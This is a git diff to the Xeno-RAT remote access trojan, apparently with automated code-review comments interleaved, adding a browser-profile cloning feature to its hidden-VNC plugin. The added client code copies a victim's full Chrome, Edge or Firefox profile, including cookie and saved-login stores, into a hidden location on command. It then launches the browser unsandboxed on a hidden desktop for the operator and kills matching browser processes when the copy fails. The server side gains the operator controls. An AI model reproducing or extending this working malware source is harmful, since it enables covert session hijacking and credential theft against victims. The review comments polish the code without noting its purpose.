diff --git a/Plugins/Hvnc/Hvnc.cs b/Plugins/Hvnc/Hvnc.cs index c7071ae..223cb8a 100644 --- a/Plugins/Hvnc/Hvnc.cs +++ b/Plugins/Hvnc/Hvnc.cs @@ -11,6 +11,8 @@ using System.Drawing.Imaging; using System.Runtime.InteropServices; using System.Windows.Forms; +using System.Management; +using System.Diagnostics; namespace Plugin { @@ -19,6 +21,13 @@ public class Main Node ImageNode; bool playing = false; int quality = 100; + bool do_browser_clone = false; + bool cloning_chrome = false; + bool cloning_firefox = false; + bool cloning_edge = false; + bool has_clonned_chrome = false; + bool has_clonned_firefox=false; + bool has_clonned_edge = false; Imaging_handler ImageHandler; input_handler InputHandler; Process_Handler ProcessHandler; @@ -65,7 +74,7 @@ public async Task Run(Node node) IntPtr lParam = (IntPtr)node.sock.BytesToInt(await node.ReceiveAsync()); new Thread(() => InputHandler.Input(msg, wParam, lParam)).Start(); } - else if (data[0] == 4) + else if (data[0] == 4) { ProcessHandler.StartExplorer(); } @@ -73,6 +82,52 @@ public async Task Run(Node node) { ProcessHandler.CreateProc(Encoding.UTF8.GetString(await node.ReceiveAsync())); } + else if (data[0] == 6) + { + do_browser_clone = true; + } + else if (data[0] == 7) + { + do_browser_clone = false; + } + else if (data[0] == 8) + { //start chrome + if (do_browser_clone && !has_clonned_chrome) + { + has_clonned_chrome = true; + HandleCloneChrome(); + } + else + { + ProcessHandler.StartChrome(); + } + } + else if (data[0] == 9) + { //start firefox + if (do_browser_clone && !has_clonned_firefox) + { + has_clonned_firefox = true; + HandleCloneFirefox(); + + } + else + { + ProcessHandler.StartFirefox(); + } + } + else if (data[0] == 10) + { //start edge + if (do_browser_clone && !has_clonned_edge) + { + has_clonned_edge = true; + HandleCloneEdge(); + + } + else + { + ProcessHandler.StartEdge(); + } + } } } catch 
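Review bot: The command bytes 6 through 10 added to the `data[0]` chain in Run are bare magic numbers, and the only comments (`//start chrome`, `//start firefox`, `//start edge`) do not say that the first such command after byte 6 copies the user's browser profile before the browser is launched. A comment above the chain would make that readable, e.g. `// 6/7: turn profile cloning on/off; 8/9/10: launch Chrome/Firefox/Edge, cloning the local profile first when cloning is on and has not yet run`. The same bytes are repeated as literals in the server-side senders in xeno rat server/Forms/Hvnc.cs, so one named constant per command would keep the two ends in step. The `HandleClone*` calls are not awaited, so anything that escapes them is never observed by Run's `catch`. Run's body starts and ends outside the hunk.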
@@ -86,6 +141,111 @@ public async Task Run(Node node) GC.Collect(); } + + private async Task GetProcessViaCommandLine(string processName, string searchString) { + return await Task.Run(() => + { + ManagementObjectSearcher searcher = new ManagementObjectSearcher($"SELECT * FROM Win32_Process WHERE Name = '{processName}'"); + + foreach (ManagementObject obj in searcher.Get()) + { + string commandLine = obj["CommandLine"]?.ToString(); + + if (commandLine != null && commandLine.Contains(searchString)) + { + return Convert.ToInt32(obj["ProcessId"]); + } + } + + return -1; + }); + } + + + private async Task HandleCloneChrome() + { + if (!cloning_chrome) + { + cloning_chrome = true; + try + { + await ProcessHandler.CloneChrome(); + } + catch + { + int pid = await GetProcessViaCommandLine("chrome.exe", "ChromeAutomationData"); + if (pid != -1) + { + Process p = Process.GetProcessById(pid); + try + { + p.Kill(); + await ProcessHandler.CloneChrome(); + } + catch { } + p.Dispose(); + } + } + ProcessHandler.StartChrome(); + cloning_chrome = false; + } + } + private async Task HandleCloneFirefox() + { + if (!cloning_firefox) + { + cloning_firefox = true; + try + { + await ProcessHandler.CloneFirefox(); + } + catch + { + int pid = await GetProcessViaCommandLine("firefox.exe", "FirefoxAutomationData"); + if (pid != -1) + { + Process p = Process.GetProcessById(pid); + try + { + p.Kill(); + await ProcessHandler.CloneFirefox(); + } + catch { } + p.Dispose(); + } + } + ProcessHandler.StartFirefox(); + cloning_firefox = false; + } + } + private async Task HandleCloneEdge() + { + if (!cloning_edge) + { + cloning_edge = true; + try + { + await ProcessHandler.CloneEdge(); + } + catch + { + int pid = await GetProcessViaCommandLine("msedge.exe", "EdgeAutomationData"); + if (pid != -1) + { + Process p = Process.GetProcessById(pid); + try + { + p.Kill(); + await ProcessHandler.CloneEdge(); + } + catch { } + p.Dispose(); + } + } + ProcessHandler.StartEdge(); + cloning_edge = false; + } + } 
public async Task ScreenShotThread() { try diff --git a/Plugins/Hvnc/Hvnc.csproj b/Plugins/Hvnc/Hvnc.csproj index af92dbe..6144588 100644 --- a/Plugins/Hvnc/Hvnc.csproj +++ b/Plugins/Hvnc/Hvnc.csproj @@ -35,6 +35,7 @@ + diff --git a/Plugins/Hvnc/Process Handler.cs b/Plugins/Hvnc/Process Handler.cs index ea87fac..1120170 100644 --- a/Plugins/Hvnc/Process Handler.cs +++ b/Plugins/Hvnc/Process Handler.cs @@ -6,6 +6,7 @@ using System.Linq; using System.Runtime.InteropServices; using System.Text; +using System.Threading; using System.Threading.Tasks; using xeno_rat_client; 
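Review bot: GetProcessViaCommandLine never disposes the `ManagementObjectSearcher` or the objects it enumerates, and the fallback paths in HandleCloneChrome, HandleCloneFirefox and HandleCloneEdge end in `catch { }`, so a failed kill or a failed copy leaves no trace at all. Wrapping the searcher as `using (var searcher = new ManagementObjectSearcher(...))` and replacing the empty catches with at least a logged message would address both. The three HandleClone* methods are identical apart from the process name and the marker string, and none says that on failure it terminates a running browser process matched by a command-line substring (`ChromeAutomationData`, `FirefoxAutomationData`, `EdgeAutomationData`) found through a WMI `Win32_Process` query; a summary comment on one shared helper should state that side effect. The WQL text is built by interpolating `processName`; only constants are passed in this hunk, and the helper's comment should say it must stay that way.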
@@ -89,6 +90,219 @@ public bool StartExplorer() return CreateProc(@"C:\Windows\explorer.exe"); } + public string getChromePath() + { + + var path = Registry.GetValue(@"HKEY_CLASSES_ROOT\ChromeHTML\shell\open\command", null, null) as string; + if (path != null) + { + var split = path.Split('\"'); + path = split.Length >= 2 ? split[1] : null; + } + return path; + } + + public string GetEdgePath() + { + string edgeRegistryPath = @"SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\msedge.exe"; + + using (RegistryKey key = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64).OpenSubKey(edgeRegistryPath)) + { + if (key != null) + { + object edgePathObj = key.GetValue(""); + + if (edgePathObj != null) + { + return edgePathObj.ToString(); + } + } + } + + return null; + } + public string GetFirefoxPath() + { + string firefoxRegistryPath = @"SOFTWARE\Mozilla\Mozilla Firefox"; + + using (RegistryKey key = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64).OpenSubKey(firefoxRegistryPath)) + { + if (key != null) + { + object firefoxPathObj = key.GetValue("CurrentVersion"); + + if (firefoxPathObj != null) + { + string currentVersion = firefoxPathObj.ToString(); + string pathKey = $@"SOFTWARE\Mozilla\Mozilla Firefox\{currentVersion}\Main"; + + using (RegistryKey pathSubKey = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64).OpenSubKey(pathKey)) + { + if (pathSubKey != null) + { + object pathValue = pathSubKey.GetValue("PathToExe"); + + if (pathValue != null) + { + return pathValue.ToString(); + } + } + } + } + } + } + return null; + } + public bool StartChrome() + { + string dataDir = @"C:\ChromeAutomationData"; + string path = getChromePath(); + if (path == null || !File.Exists(path)) + { + return false; + } + return CreateProc("\"" + path + "\"" + " --no-sandbox --allow-no-sandbox-job --disable-gpu --user-data-dir="+dataDir); + } + + public bool StartEdge() + { + string dataDir = 
@"C:\EdgeAutomationData"; + string path = GetEdgePath(); + if (path == null || !File.Exists(path)) + { + return false; + } + return CreateProc("\"" + path + "\"" + " --no-sandbox --allow-no-sandbox-job --disable-gpu --user-data-dir=" + dataDir); + } + + public bool StartFirefox() + { + string dataDir = @"C:\FirefoxAutomationData"; + string path = GetFirefoxPath(); + if (path == null || !File.Exists(path)) + { + return false; + } + return CreateProc("\"" + path + "\"" + " -no-remote -profile " + dataDir); + } + + public async Task CloneChrome() + { + try + { + string dataDir = @"C:\ChromeAutomationData"; + string source = $@"C:\Users\{Environment.UserName}\AppData\Local\Google\Chrome\User Data"; + await Task.Run(() => Directory.Delete(dataDir, true)); + Directory.CreateDirectory(dataDir); + await CopyDirAsync(source, dataDir); + return true; + + } + catch { } + return false; + } + + public async Task CloneFirefox() + { + try + { + string profilesPath = $@"C:\Users\{Environment.UserName}\AppData\Roaming\Mozilla\Firefox\Profiles"; + string fileInDirectory = "addons.json"; + string source=RecursiveFileSearch(profilesPath, fileInDirectory); + if (source == null) + { + return false; + } + string dataDir = @"C:\FirefoxAutomationData"; + await Task.Run(() => Directory.Delete(dataDir, true)); + Directory.CreateDirectory(dataDir); + await CopyDirAsync(source, dataDir); + return true; + + } + catch { } + return false; + } + + public async Task CloneEdge() + { + try + { + string dataDir = @"C:\EdgeAutomationData"; + string source = $@"C:\Users\{Environment.UserName}\AppData\Local\Microsoft\Edge\User Data"; + await Task.Run(()=>Directory.Delete(dataDir, true)); + Directory.CreateDirectory(dataDir); + await CopyDirAsync(source, dataDir); + return true; + + } + catch { } + return false; + } + static string RecursiveFileSearch(string currentDirectory, string targetFileName) + { + string targetFilePath = Path.Combine(currentDirectory, targetFileName); + if 
(File.Exists(targetFilePath)) + { + return currentDirectory; + } + foreach (string subdirectory in Directory.GetDirectories(currentDirectory)) + { + string result = RecursiveFileSearch(subdirectory, targetFileName); + if (result != null) + { + return result; + } + } + return null; + } + + public async Task CopyDirAsync(string sourceDir, string destinationDir) + { + await CopyDirectoriesAsync(sourceDir, destinationDir); + + IEnumerable files = Directory.EnumerateFiles(sourceDir, "*", SearchOption.AllDirectories); + await CopyFilesInParallelAsync(files, sourceDir, destinationDir, maxParallelism: 10); // Set your desired parallelism limit + } + + private async Task CopyDirectoriesAsync(string sourceDir, string destinationDir) + { + IEnumerable directories = Directory.EnumerateDirectories(sourceDir, "*", SearchOption.AllDirectories); + + foreach (string dir in directories) + { + string relativePath = dir.Substring(sourceDir.Length + 1); + string destinationPath = Path.Combine(destinationDir, relativePath); + + await Task.Run(() => Directory.CreateDirectory(destinationPath)); + } + } + + private static async Task CopyFilesInParallelAsync(IEnumerable files, string sourceDir, string destinationDir, int maxParallelism) + { + var semaphore = new SemaphoreSlim(maxParallelism); + + async Task CopyFileAsync(string filePath) + { + string relativePath = filePath.Substring(sourceDir.Length + 1); + string destinationPath = Path.Combine(destinationDir, relativePath); + + try + { + await semaphore.WaitAsync(); + await Task.Run(() => File.Copy(filePath, destinationPath, true)); + } + finally + { + semaphore.Release(); + } + } + + var copyTasks = files.Select(CopyFileAsync).ToArray(); + + await Task.WhenAll(copyTasks); + } + public bool CreateProc(string filePath) { STARTUPINFO si = new STARTUPINFO(); diff --git a/xeno rat client/DllHandler.cs b/xeno rat client/DllHandler.cs index 7b00141..98c3d09 100644 --- a/xeno rat client/DllHandler.cs +++ b/xeno rat client/DllHandler.cs 
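Review bot: CloneChrome, CloneFirefox and CloneEdge carry no documentation and swallow every failure with `catch { }`, so nothing in the file records that they duplicate the signed-in user's entire browser profile directory, which normally holds the cookie and saved-login stores, into a fixed folder at the drive root that this hunk never removes. Each deserves a summary comment stating the source, the destination and that the copy persists after the session. The destination paths (`C:\ChromeAutomationData`, `C:\EdgeAutomationData`, `C:\FirefoxAutomationData`) are repeated as literals in the Start* and Clone* methods and again as match strings in Plugins/Hvnc/Hvnc.cs; one constant per browser, e.g. `private const string ChromeDataDir = @"C:\ChromeAutomationData";`, would keep them consistent. StartChrome and StartEdge launch the browser with `--no-sandbox --allow-no-sandbox-job` against that copy, which should be called out in a comment because it runs the browser without its sandbox. In CopyFilesInParallelAsync, `semaphore.WaitAsync()` sits inside the `try`, so a failed wait would still reach `semaphore.Release()`; the wait belongs before the `try`.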
@@ -40,8 +40,8 @@ public async Task DllNodeHandler(Node subServer) } catch (Exception e) { - Console.WriteLine(e.Message); await subServer.SendAsync(fail); + await subServer.SendAsync(Encoding.UTF8.GetBytes(e.Message)); } } } diff --git a/xeno rat client/Handler.cs b/xeno rat client/Handler.cs index 755e4fc..d27e3ed 100644 --- a/xeno rat client/Handler.cs +++ b/xeno rat client/Handler.cs @@ -57,7 +57,7 @@ private async Task GetAndSendInfo(Node Type0) return; } //get hwid, username etc. seperated by null - string clientversion = "1.3.0";//find a way to get the client version. + string clientversion = "1.4.0";//find a way to get the client version. string[] info = new string[] { Utils.HWID(), Environment.UserName , clientversion, Utils.GetWindowsVersion(), Utils.GetAntivirus(), Utils.IsAdmin().ToString() }; byte[] data = new byte[0]; byte[] nullbyte = new byte[] { 0 }; diff --git a/xeno rat server/Forms/Hvnc.Designer.cs b/xeno rat server/Forms/Hvnc.Designer.cs index efbcf5a..5a8bf40 100644 --- a/xeno rat server/Forms/Hvnc.Designer.cs +++ b/xeno rat server/Forms/Hvnc.Designer.cs @@ -40,6 +40,7 @@ private void InitializeComponent() this.button7 = new System.Windows.Forms.Button(); this.button8 = new System.Windows.Forms.Button(); this.button9 = new System.Windows.Forms.Button(); + this.checkBox1 = new System.Windows.Forms.CheckBox(); ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).BeginInit(); this.SuspendLayout(); // 
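Review bot: The failure reply in DllNodeHandler's `catch` is now two frames, the `fail` byte followed by the UTF-8 text of `e.Message`, and neither this hunk nor the matching reader in xeno rat server/Utils.cs (LoadDllAsync) documents that. A comment such as `// failure reply: fail byte, then the UTF-8 exception message` on both sides would record the wire change. As written, the reader always awaits the second frame when `dllloadinfo[0] != 3`, so a peer that still sends only the single byte would leave that `ReceiveAsync` waiting; this is inferred from the two hunks, not from the Node implementation. The received text is passed to `Logcallback` as is, with no length cap visible in the hunk.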
@@ -166,11 +167,24 @@ private void InitializeComponent() this.button9.UseVisualStyleBackColor = true; this.button9.Click += new System.EventHandler(this.button9_Click); // + // checkBox1 + // + this.checkBox1.AutoSize = true; + this.checkBox1.Enabled = false; + this.checkBox1.Location = new System.Drawing.Point(1049, 852); + this.checkBox1.Name = "checkBox1"; + this.checkBox1.Size = new System.Drawing.Size(126, 17); + this.checkBox1.TabIndex = 11; + this.checkBox1.Text = "Browser Clone Profile"; + this.checkBox1.UseVisualStyleBackColor = true; + this.checkBox1.CheckedChanged += new System.EventHandler(this.checkBox1_CheckedChanged); + // // Hvnc // this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F); this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font; this.ClientSize = new System.Drawing.Size(1924, 888); + this.Controls.Add(this.checkBox1); this.Controls.Add(this.button9); this.Controls.Add(this.button8); this.Controls.Add(this.button7); @@ -187,6 +201,7 @@ private void InitializeComponent() this.Load += new System.EventHandler(this.Hvnc_Load); ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).EndInit(); this.ResumeLayout(false); + this.PerformLayout(); } @@ -203,5 +218,6 @@ private void InitializeComponent() private System.Windows.Forms.Button button7; private System.Windows.Forms.Button button8; private System.Windows.Forms.Button button9; + private System.Windows.Forms.CheckBox checkBox1; } } \ No newline at end of file diff --git a/xeno rat server/Forms/Hvnc.cs b/xeno rat server/Forms/Hvnc.cs index e88d815..9e59bae 100644 --- a/xeno rat server/Forms/Hvnc.cs +++ b/xeno rat server/Forms/Hvnc.cs @@ -19,6 +19,7 @@ public partial class Hvnc : Form Node ImageNode; string DesktopName = "hidden_desktop"; bool playing = false; + bool is_clonning_browser = false; string[] qualitys = new string[] { "100%", "90%", "80%", "70%", "60%", "50%", "40%", "30%", "20%", "10%" }; CustomPictureBox customPictureBox1; public Hvnc(Node _client) 
@@ -122,6 +123,39 @@ private async Task StartProc(string path) await client.SendAsync(new byte[] { 5 }); await client.SendAsync(Encoding.UTF8.GetBytes(path)); } + + private async Task EnableBrowserClone() + { + if (!playing || is_clonning_browser) return; + await client.SendAsync(new byte[] { 6 }); + is_clonning_browser = true; + } + private async Task DisableBrowserClone() + { + if (!playing || !is_clonning_browser) return; + await client.SendAsync(new byte[] { 7 }); + is_clonning_browser = false; + } + + private async Task StartChrome() + { + if (!playing) return; + await client.SendAsync(new byte[] { 8 }); + } + + private async Task StartFirefox() + { + if (!playing) return; + await client.SendAsync(new byte[] { 9 }); + } + + private async Task StartEdge() + { + if (!playing) return; + await client.SendAsync(new byte[] { 10 }); + } + + private async Task CreateImageNode() { if (ImageNode != null) @@ -158,6 +192,7 @@ private void Hvnc_Load(object sender, EventArgs e) private async void button1_Click(object sender, EventArgs e) { //start + checkBox1.Enabled = true; await start(); button1.Enabled = false; playing = true; @@ -166,6 +201,7 @@ private async void button1_Click(object sender, EventArgs e) private async void button2_Click(object sender, EventArgs e) { //stop + checkBox1.Enabled = false; await stop(); button1.Enabled = true; playing = false; 
@@ -202,17 +238,29 @@ private async void button4_Click(object sender, EventArgs e) private async void button5_Click(object sender, EventArgs e) { - await StartProc("\"" + @"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" + "\"" + @" --no-sandbox --allow-no-sandbox-job --disable-gpu --user-data-dir=C:\AutomationUser"); + await StartEdge(); + if (is_clonning_browser) + { + new Thread(()=>MessageBox.Show("It can take a while to clone the profile data, if the browser doesnt launch, please wait...")).Start(); + } } private async void button6_Click(object sender, EventArgs e) { - await StartProc("\"" + @"C:\Program Files\Google\Chrome\Application\chrome.exe" + "\"" + @" --no-sandbox --allow-no-sandbox-job --disable-gpu --user-data-dir=C:\AutomationUser"); + await StartChrome(); + if (is_clonning_browser) + { + new Thread(() => MessageBox.Show("It can take a while to clone the profile data, if the browser doesnt launch, please wait...")).Start(); + } } private async void button7_Click(object sender, EventArgs e) { - await StartProc("\"" + @"C:\Program Files\Mozilla Firefox\firefox.exe" + "\"" + @" -no-remote -profile C:\AutomationUser"); + await StartFirefox(); + if (is_clonning_browser) + { + new Thread(() => MessageBox.Show("It can take a while to clone the profile data, if the browser doesnt launch, please wait...")).Start(); + } } private async void button8_Click(object sender, EventArgs e) @@ -229,6 +277,19 @@ private void pictureBox1_Click(object sender, EventArgs e) { } + + private async void checkBox1_CheckedChanged(object sender, EventArgs e) + { + if (!playing) return; + if (checkBox1.Checked) + { + await EnableBrowserClone(); + } + else + { + await DisableBrowserClone(); + } + } } diff --git a/xeno rat server/MainForm.Designer.cs b/xeno rat server/MainForm.Designer.cs index 2bb17fc..d35a26c 100644 --- a/xeno rat server/MainForm.Designer.cs +++ b/xeno rat server/MainForm.Designer.cs 
@@ -231,6 +231,7 @@ private void InitializeComponent() this.listView3.Columns.AddRange(new System.Windows.Forms.ColumnHeader[] { this.columnHeader11, this.columnHeader12}); + this.listView3.FullRowSelect = true; this.listView3.GridLines = true; this.listView3.HideSelection = false; this.listView3.Location = new System.Drawing.Point(4, 0); @@ -239,6 +240,8 @@ private void InitializeComponent() this.listView3.TabIndex = 0; this.listView3.UseCompatibleStateImageBehavior = false; this.listView3.View = System.Windows.Forms.View.Details; + this.listView3.SelectedIndexChanged += new System.EventHandler(this.listView3_SelectedIndexChanged); + this.listView3.MouseClick += new System.Windows.Forms.MouseEventHandler(this.listView3_MouseClick); // // columnHeader11 // diff --git a/xeno rat server/MainForm.cs b/xeno rat server/MainForm.cs index b1e51d6..c562020 100644 --- a/xeno rat server/MainForm.cs +++ b/xeno rat server/MainForm.cs @@ -48,7 +48,7 @@ public MainForm() { InitializeComponent(); - this.Text = "Xeno-rat: Created by moom825 - version 1.3.0"; + this.Text = "Xeno-rat: Created by moom825 - version 1.4.0"; key = Utils.CalculateSha256Bytes(string_key); ListeningHandler =new Listener(OnConnect); @@ -1588,6 +1588,26 @@ private void richTextBox1_TextChanged(object sender, EventArgs e) { } + + private void listView3_SelectedIndexChanged(object sender, EventArgs e) + { + + } + + private void listView3_MouseClick(object sender, MouseEventArgs e) + { + if (e.Button == MouseButtons.Right && listView3.SelectedItems.Count > 0) + { + string selectedValue = listView3.SelectedItems[0].SubItems[0].Text+": "+ listView3.SelectedItems[0].SubItems[1].Text; + + ContextMenu contextMenu = new ContextMenu(); + MenuItem copyMenuItem = new MenuItem("Copy"); + copyMenuItem.Click += (s, args) => Clipboard.SetText(selectedValue); + contextMenu.MenuItems.Add(copyMenuItem); + + contextMenu.Show(listView3, e.Location); + } + } } public static class IconInjector { 
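Review bot: listView3_MouseClick builds a new `ContextMenu` and `MenuItem` on every right-click and never disposes them; a single menu created once and reused would avoid the per-click allocation. `listView3_SelectedIndexChanged` is wired in the designer but its body is empty, so the subscription and the method can both be dropped. `SubItems[1]` is read without checking the sub-item count; the designer hunk shows two columns, so this holds only while every row is added with both values.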
diff --git a/xeno rat server/Utils.cs b/xeno rat server/Utils.cs index 02e8811..e49eb5a 100644 --- a/xeno rat server/Utils.cs +++ b/xeno rat server/Utils.cs @@ -102,9 +102,11 @@ public static async Task LoadDllAsync(Node clientsubsock, string dllname, byte[] dllloadinfo = await clientsubsock.ReceiveAsync(); if (dllloadinfo[0] != 3) { + byte[] errorMessage = await clientsubsock.ReceiveAsync(); if (Logcallback != null) { Logcallback($"Starting {dllname} dll failed !", Color.Red); + Logcallback(Encoding.UTF8.GetString(errorMessage), Color.Red); } return false; }